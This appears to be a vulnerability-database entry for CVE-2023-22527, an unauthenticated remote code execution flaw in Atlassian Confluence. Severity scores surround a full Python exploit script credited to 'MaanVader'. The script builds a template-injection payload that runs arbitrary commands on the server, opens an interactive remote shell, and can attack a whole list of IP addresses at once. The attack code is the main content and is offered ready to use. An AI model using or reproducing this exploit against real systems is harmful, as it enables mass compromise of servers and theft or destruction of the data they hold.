10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527
import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()
# Rich console for formatted output
console = Console()
# Function to send payload
def send_payload(url, command):
headers = {
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'
}
payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
'&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
headers['Content-Length'] = str(len(payload))
full_url = f"{url}/template/aui/text-inline.vm"
response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
return response.text.split('<!DOCTYPE html>')[0].strip()
# Interactive shell function
def interactive_shell(url):
session = PromptSession()
console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
while True:
try:
cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
if cmd.lower() in ["exit", "quit"]:
break
response = send_payload(url, cmd)
console.print(response)
except KeyboardInterrupt:
break
except Exception as e:
console.print(f"[bold red]Error: {e}[/bold red]")
break
# Process file function
def process_file(file_path):
with open(file_path, 'r') as file:
for line in file:
ip = line.strip()
url = f"http://{ip}:8090"
console.print(f"Processing {url}")
print(send_payload(url, args.command))
# Main execution logic
if args.shell and args.url:
interactive_shell(args.url)
elif args.url and args.command:
print(send_payload(args.url, args.command))
elif args.file and args.command:
process_file(args.file)
else:
print("Error: Please provide a valid URL and a command or use the interactive shell option.")
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%